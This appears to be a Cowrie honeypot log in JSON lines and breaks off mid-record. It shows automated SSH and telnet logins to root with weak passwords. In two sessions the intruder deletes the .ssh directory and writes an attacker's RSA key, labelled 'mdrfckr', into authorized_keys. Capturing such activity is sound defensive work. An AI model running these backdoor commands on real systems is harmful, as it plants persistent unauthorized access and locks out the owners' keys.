{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:28.761152Z","src_ip":"213.209.150.239","session":"c68e53e49476"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55304,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d0aaac0d6f2","protocol":"ssh","message":"New connection: 212.227.235.229:55304 (1.2.3.4:22) [session: 3d0aaac0d6f2]","sensor":"my-vps","timestamp":"2025-08-26T04:39:43.474925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:39:43.476019Z","src_ip":"212.227.235.229","session":"3d0aaac0d6f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:39:44.700993Z","src_ip":"212.227.235.229","session":"3d0aaac0d6f2"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc1234567","message":"login attempt [root/Abc1234567] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:39:45.467161Z","src_ip":"212.227.235.229","session":"3d0aaac0d6f2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:39:46.047347Z","src_ip":"212.227.235.229","session":"3d0aaac0d6f2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:39:46.048158Z","src_ip":"212.227.235.229","session":"3d0aaac0d6f2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:39:46.049248Z","src_ip":"212.227.235.229","session":"3d0aaac0d6f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:46.305156Z","src_ip":"212.227.235.229","session":"3d0aaac0d6f2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:39:47.399796Z","src_ip":"212.227.235.229","session":"3d0aaac0d6f2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:39:47.400648Z","src_ip":"212.227.235.229","session":"3d0aaac0d6f2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:39:47.657387Z","src_ip":"212.227.235.229","session":"3d0aaac0d6f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:47.658446Z","src_ip":"212.227.235.229","session":"3d0aaac0d6f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41782,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff48ef704bb1","protocol":"ssh","message":"New connection: 212.227.235.229:41782 (1.2.3.4:22) [session: ff48ef704bb1]","sensor":"my-vps","timestamp":"2025-08-26T04:39:47.893779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:39:47.894994Z","src_ip":"212.227.235.229","session":"ff48ef704bb1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:39:49.099690Z","src_ip":"212.227.235.229","session":"ff48ef704bb1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:39:49.834895Z","src_ip":"212.227.235.229","session":"ff48ef704bb1"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:51.082652Z","src_ip":"212.227.235.229","session":"ff48ef704bb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41798,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce862a4b49d6","protocol":"ssh","message":"New connection: 212.227.235.229:41798 (1.2.3.4:22) [session: ce862a4b49d6]","sensor":"my-vps","timestamp":"2025-08-26T04:39:51.331230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:39:51.332152Z","src_ip":"212.227.235.229","session":"ce862a4b49d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:39:51.588599Z","src_ip":"212.227.235.229","session":"ce862a4b49d6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:39:52.632704Z","src_ip":"212.227.235.229","session":"ce862a4b49d6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:52.885154Z","src_ip":"212.227.235.229","session":"ce862a4b49d6"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:52.893407Z","src_ip":"212.227.235.229","session":"3d0aaac0d6f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50972,"dst_ip":"1.2.3.4","dst_port":22,"session":"38bf57424df3","protocol":"ssh","message":"New connection: 212.227.235.229:50972 (1.2.3.4:22) [session: 38bf57424df3]","sensor":"my-vps","timestamp":"2025-08-26T04:39:56.313957Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:39:56.314813Z","src_ip":"212.227.235.229","session":"38bf57424df3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:39:56.594030Z","src_ip":"212.227.235.229","session":"38bf57424df3"}
{"eventid":"cowrie.login.success","username":"root","password":"Secure@2025","message":"login attempt [root/Secure@2025] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:39:57.715101Z","src_ip":"212.227.235.229","session":"38bf57424df3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:39:58.291716Z","src_ip":"212.227.235.229","session":"38bf57424df3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:39:58.292419Z","src_ip":"212.227.235.229","session":"38bf57424df3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:39:58.293405Z","src_ip":"212.227.235.229","session":"38bf57424df3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:58.574906Z","src_ip":"212.227.235.229","session":"38bf57424df3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:39:59.261353Z","src_ip":"212.227.235.229","session":"38bf57424df3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:39:59.262123Z","src_ip":"212.227.235.229","session":"38bf57424df3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:39:59.543995Z","src_ip":"212.227.235.229","session":"38bf57424df3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:59.544977Z","src_ip":"212.227.235.229","session":"38bf57424df3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50974,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3ccb565d472","protocol":"ssh","message":"New connection: 212.227.235.229:50974 (1.2.3.4:22) [session: c3ccb565d472]","sensor":"my-vps","timestamp":"2025-08-26T04:39:59.820937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:39:59.821742Z","src_ip":"212.227.235.229","session":"c3ccb565d472"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:40:00.100222Z","src_ip":"212.227.235.229","session":"c3ccb565d472"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:40:01.257605Z","src_ip":"212.227.235.229","session":"c3ccb565d472"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:40:02.539366Z","src_ip":"212.227.235.229","session":"c3ccb565d472"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50980,"dst_ip":"1.2.3.4","dst_port":22,"session":"e709afed033d","protocol":"ssh","message":"New connection: 212.227.235.229:50980 (1.2.3.4:22) [session: e709afed033d]","sensor":"my-vps","timestamp":"2025-08-26T04:40:02.816871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:40:02.817931Z","src_ip":"212.227.235.229","session":"e709afed033d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:40:03.095363Z","src_ip":"212.227.235.229","session":"e709afed033d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:40:04.248812Z","src_ip":"212.227.235.229","session":"e709afed033d"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:40:04.528500Z","src_ip":"212.227.235.229","session":"38bf57424df3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:40:04.529418Z","src_ip":"212.227.235.229","session":"e709afed033d"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":59752,"dst_ip":"1.2.3.4","dst_port":23,"session":"60457b97365b","protocol":"telnet","message":"New connection: 176.65.149.186:59752 (1.2.3.4:23) [session: 60457b97365b]","sensor":"my-vps","timestamp":"2025-08-26T04:40:19.397233Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:40:19.436703Z","src_ip":"176.65.149.186","session":"60457b97365b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:40:19.455355Z","src_ip":"176.65.149.186","session":"60457b97365b"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T04:40:19.456610Z","src_ip":"176.65.149.186","session":"60457b97365b"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T04:40:19.457713Z","src_ip":"176.65.149.186","session":"60457b97365b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40656,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a4cc63bc1d5","protocol":"ssh","message":"New connection: 212.227.235.229:40656 (1.2.3.4:22) [session: 4a4cc63bc1d5]","sensor":"my-vps","timestamp":"2025-08-26T04:40:21.529431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:40:21.530233Z","src_ip":"212.227.235.229","session":"4a4cc63bc1d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 